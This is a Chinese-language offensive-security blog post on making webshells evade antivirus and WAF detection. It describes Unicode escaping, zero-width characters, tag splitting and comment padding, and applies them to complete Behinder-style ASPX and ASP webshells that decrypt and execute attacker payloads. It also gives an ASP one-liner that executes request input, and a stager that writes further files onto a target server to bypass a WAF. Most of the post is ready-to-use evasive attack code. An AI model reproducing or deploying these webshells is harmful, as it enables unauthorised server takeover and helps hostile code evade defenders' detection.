关于webshell免杀的应用思路

技术

前言

picture.image

在攻防场景下,比如我们常常在找到某个上传接口,第一步肯定是先测试后缀是否有限制,第二步则是测试上传的文件是否能解析,最后便确认即将要上传的webshell内容是否有拦截。这里针对webshell内容拦截这块做了记录,下面先对aspx类型和asp类型这两块展开,希望能给大家作为参考。

一、ASPX类型

其中aspx类型中,我们可以利用下面列出的这些特性对内容作对应的处理,以达到免杀的目的


                    
1、unicode编码
                    
2、空字符串连接
                    
3、<%%>截断
                    
3、头部替换
                    
5、特殊符号@
                    
6、注释
                

1.unicode编码

例如"eval"他可以变为\u0065\u0076\u0061\u006C

那么如下例子可以转换为:


                  
                      

                    <%@ Page Language="Jscript"%><%\u0065\u0076\u0061\u006c(@Request.Item["hello"],"unsafe");%>
                  
                

在JScript的情况下它不支持大U和多个0的增加,但是在c#的情况下,是可以支持大U和多个0的增加。

picture.image

2、空字符串连接

unicode是支持在aspx里进行的,同样的,它也支持asmx和ashx,估计这类特性都是通用的。并且在unicode有一类字符叫做零宽连字符(全称zero width joiner)。

在函数字符串中插入这些字符都不会影响脚本的正常运行,在测试前需要注意该类字符插入的位置,否则插入错误的地方会产生报错。


                    
\u200c
                    
\u200d
                    
\u200e
                    
\u200f
                

除了上面的zero width joiner,还有一种unicode编码叫做零宽不折行空格,也就是如下几种字符,都支持在字符间进行拼接


                    
\ufeff
                    
\u202a
                    
\u202b
                    
\u202c
                    
\u202d
                    
\u202e
                

例子:


                  
                      

                    <%c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth);%>
                  
                

3、使用<%%>语法

将整个字符串与函数利用多个<%%>进行分割


                  
                      

                    <%@ Page Language="Jscript"%><%\u0065\u0076\u0061\u006c%><%(Request.%>
                  
                

4、头部免杀

该字段可以放在后面,不一定要放前面


                    
<%@Page Language="csharp"%>
                    
<%@ Page Language="Jscript"%>
                    
<%@Page Language=JS%>
                    
<% @language="Csharp" %>
                

5、使用符号

可以添加@符号但是不会影响其解析


                  
                      

                    <%.@CreateDecryptor(k, k)%>
                  
                

6、注释插入


                  
                      

                    <%/*TreeObject*/./*TreeObject*/GetBytes(Session[0] + ""),%>
                  
                

7、花括号和分号

{}和分号;在原本语法结束的地方可以添加大量的该类混淆,不会影响其原本的解析


                    
<% @page language=c#%>;;;;;;;;;;;;;;;;;;;;
                    
<%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b");{{{}}} byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);{{{;}}} Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);;;;;;;;;;;;;;;;;;;;;%>
                

picture.image

8、aspx别的声明标签

在php中,解析引擎可以认识


                    
1、XML标记风格
                    
<?php
                    
echo "XML 标记风格"?>
                    
2、脚本风格
                    
<script language='php'>
                    
echo "脚本风格";
                    
</script>
                    
3、简短标记风格
                    
<?
                    
echo "简短标记风格"?>
                    
注意php.ini中的short_open_tag 选项必须为on
                    
4、ASP标记风格
                    
<%
                    
echo '这是asp标记风格'
                    
%>
                    
注意php.ini中的asp_tags 选项必须为on
                

aspx中也有类似的标签风格


                    
<% @language="C#" %>
                    
<%Response.Write("hello");%>
                

                    
<script language=csharp runat=server>
                    
void page_load(){Response.Write("hello");}
                    
</script>
                

9、换行特性

10、c#的 ///特性和xml

c#规定了/// 能够在aspx中作为xml语法的注释,那么在实际使用中,我们结合换行、unicode特性可以这样做,在如下内容中加入///充当注释:


                    
<%
                    
@
                    
language 
                    
= 
                    
c#
                    
%>
                    
<%
                    
@Import 
                    
 Namespace="System.Reflection"%>
                    
<%Session.Add("k",
                    
//////@#@!#!@#!@#!@#!@#!@#!@#
                    
"e45e329feb5d925b"); byte[]
                    
//////@#@!#!@#!@#!@#!@#!@#!@#
                    
 k = Encoding.Default.GetBytes(Session[0] + ""),
                    
//////@#@!#!@#!@#!@#!@#!@#!@#
                    
c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth); 
                    
//////@#@!#!@#!@#!@#!@#!@#!@#%>
                

那么这时我们综上所说到的这些特性,对冰蝎马进行免杀处理,得到如下内容:


                    
<%@Import Namespace="System./*TreeObject*/\U00000052\U00000065\U00000066\U0000006C\U00000065\U00000063\U00000074\U00000069\U0000006F\U0000006E"%>
                    
<%\U00000053\U00000065\U00000073\U00000073\U00000069\U0000006F\U0000006E/*TreeObject*/.\U00000041\U00000064\U00000064("k","e45e329feb5d925b"); %>
                    
<%byte[] k = \U00000045\U0000006E\U00000063\U0000006F\U00000064\U00000069\U0000006E\U00000067/*TreeObject*/./*TreeObject*/Default%>
                    
<%/*TreeObject*/./*TreeObject*/\U00000047\U00000065\U00000074\U00000042\U00000079\U00000074\U00000065\U00000073(\U00000053\U00000065\U00000073\U00000073\U00000069\U0000006F\U0000006E[0] + ""),//////@#@!#!@#!@#!@#!@#!@#!@#%>
                    
<%c = \U00000052\U00000065\U00000071\U00000075\U00000065\U00000073\U00000074/*TreeObject*/./*TreeObject*/\U00000042\U00000069\U0000006E\U00000061\U00000072\U00000079\U00000052\U00000065\U00000061\U00000064/*TreeObject*/(Request.ContentLength);//////@#@!#!@#!@#!@#!@#!@#!@#/*TreeObject*/%>
                    
<%Assembly/*TreeObject*/./*TreeObject*/@\U0000004C\U0000006F\U00000061\U00000064(new System./*TreeObject*/Security%>
                    
<%./*TreeObject*/@\U00000043\U00000072\U00000079\U00000070\U00000074\U0000006F\U00000067\U00000072\U00000061\U00000070\U00000068\U00000079.\U00000052\U00000069\U0000006A\U0000006E\U00000064\U00000061\U00000065\U0000006C\U0000004D\U00000061\U0000006E\U00000061\U00000067\U00000065\U00000064()%>
                    
<%./*TreeObject*/@\U00000043\U00000072\U00000065\U00000061\U00000074\U00000065\U00000044\U00000065\U00000063\U00000072\U00000079\U00000070\U00000074\U0000006F\U00000072(k, k)%>
                    
<%./*TreeObject*/@\U00000054\U00000072\U00000061\U0000006E\U00000073\U00000066\U0000006F\U00000072\U0000006D\U00000046\U00000069\U0000006E\U00000061\U0000006C\U00000042\U0000006C\U0000006F\U00000063\U0000006B(c, 0, c.Length))%>
                    
<%./*TreeObject*/\U00000043\U00000072\U00000065\U00000061\U00000074\U00000065\U0000202c\U00000049\U0000006E\U00000073\U00000074\U00000061\U0000006E\U00000063\U00000065/*TreeObject*/%>
                    
<%(/*TreeObject*/"U"/*TreeObject*/%>
                    
<%)%>
                    
<%./*TreeObject*/\U00000045\U00000071\U00000075\U00000061\U0000006C\U00000073(this);{{{;}}}%>
                    
<% @language="CSHARP" %>
                

picture.image

同理,哥斯拉等其他的也可以按照这种方法作免杀处理。

二、ASP类型

可通过变量赋值替换,组合换行的方式进行免杀

比如常见的一句话通过变量赋值替换,即可免杀D盾


                      
                          

                        <%dim a(5)%><%a(0) = request("404")%><%b = LTrim(a(0))%><%response.write("hello")%><%eXecUTe(b)%>
                      
                    

picture.image

那么下面我们就可以利用这两个特性对冰蝎马进行免杀处理,同样得到如下内容:


                        
<%Response.write("Welcome,This is a TestPage")%><%dim a(5)%><%Response.CharSet = "UTF-8"%> <%k="3b0c14770e6bd663" %><%Session("k")=k%><%size=Request.TotalBytes%><%content=Request.BinaryRead(size)%><%For i=1 To size%><%x=ascb(midb(content,i,1))%><%y=Asc(Mid(k,(i and 15)+1,1))%><%result=result&Chr(x Xor y)%><%a(0)=result%><%b = LTrim(a(0))%><%Next%>
                        
<%
                        
<!--
                        
exEcUTe(b)
                        
-->
                        
%>
                    

picture.image

ps:再补充一个之前在xx项目测试中,利用中间马的方式绕过waf写入webshell,大概原理就是先上传一个写文件功能的,利用该功能再往目标服务器写入webshell。

往当前目录写入TypeError.asp,文件内容为<%response.write("hello")%>

picture.image


                      
                          

                        Server.CreateObject(\"Scripting.FileSystemObject\").OpenTextFile(Server.MapPath(\"TypeError.asp\"),2,True).WriteLine(HexToStr("3c25726573706f6e73652e7772697465282268656c6c6f2229253e"))
                      
                    

其中我们再定义两个函数用于混淆


                        
Function JXMD(MM):
                        
MM = Split(MM,"-")
                        
For x=0 To Ubound(MM)
                        
JXMD=JXMD&Chr(MM(x))
                        
Next
                        
End Function
                        

                        
Function HexToStr(ByRef strHex)
                        
Dim Length
                        
Dim Max
                        
Dim Str
                        
Max = Len(strHex)
                        
For Length = 1 To Max Step 2
                        
Str = Str & Chr("&h" & Mid(strHex, Length, 2))
                        
Next
                        
HexToStr = Str
                        
End function
                    

ok,接下来我们再做一下数据处理

picture.image

最后可以得到如下内容:


                        
<%
                        
<!--
                        
Function JXMD(MM):
                        
MM = Split(MM,"-")
                        
For x=0 To Ubound(MM)
                        
JXMD=JXMD&Chr(MM(x))
                        
Next
                        
End Function
                        

                        
Function HexToStr(ByRef strHex)
                        
Dim Length
                        
Dim Max
                        
Dim Str
                        
Max = Len(strHex)
                        
For Length = 1 To Max Step 2
                        
Str = Str & Chr("&h" & Mid(strHex, Length, 2))
                        
Next
                        
HexToStr = Str
                        
End function
                        

                        
eXecUTe(JXMD("83-101-114-118-101-114-46-67-114-101-97-116-101-79-98-106-101-99-116-40-34-83-99-114-105-112-116-105-110-103-46-70-105-108-101-83-121-115-116-101-109-79-98-106-101-99-116-34-41-46-79-112-101-110-84-101-120-116-70-105-108-101-40-83-101-114-118-101-114-46-77-97-112-80-97-116-104-40-34-84-121-112-101-69-114-114-111-114-46-97-115-112-34-41-44-50-44-84-114-117-101-41-46-87-114-105-116-101-76-105-110-101-40-72-101-120-84-111-83-116-114-40-34-51-99-50-53-55-50-54-53-55-51-55-48-54-102-54-101-55-51-54-53-50-101-55-55-55-50-54-57-55-52-54-53-50-56-50-50-54-56-54-53-54-99-54-99-54-102-50-50-50-57-50-53-51-101-34-41-41"))
                        

                        
-->
                        
%>
                    

同样也是具有免杀效果的

picture.image

这里可以看到访问02.asp成功往目标服务器当前目录写入预先内容的TypeError.asp

picture.image

picture.image

利用这种方式,我们便可以绕过waf往目标写入webshell,从而获取服务器权限。

同理,aspx类型的也可以利用这种方式尝试绕过waf写入对应的webshell。

如有侵权,请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell

「 超详细 | 分享 」手把手教你如何进行内网渗透

神兵利器 | siusiu-渗透工具管理套件

一款功能全面的XSS扫描器

实战 | 一次利用哥斯拉马绕过宝塔waf

BurpCrypto: 万能网站密码爆破测试工具

快速筛选真实IP并整理为C段 -- 棱眼

自动探测端口顺便爆破工具t14m4t

渗透工具|无状态子域名爆破工具(1秒扫160万个子域)

查看更多精彩内容,还请关注 橘猫学安全

每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“ **再看

”**

0
0
0
0
关于作者

文章

0

获赞

0

收藏

0

相关资源
KubeZoo: 轻量级 Kubernetes 多租户方案探索与实践
伴随云原生技术的发展,多个租户共享 Kubernetes 集群资源的业务需求应运而生,社区现有方案各有侧重,但是在海量小租户的场景下仍然存在改进空间。本次分享对现有多租户方案进行了总结和对比,然后提出一种基于协议转换的轻量级 Kubernetes 网关服务:KubeZoo,该方案能够显著降低多租户控制面带来的资源和运维成本,同时提供安全可靠的租户隔离性。
相关产品
评论
未登录
看完啦,登录分享一下感受吧~
暂无评论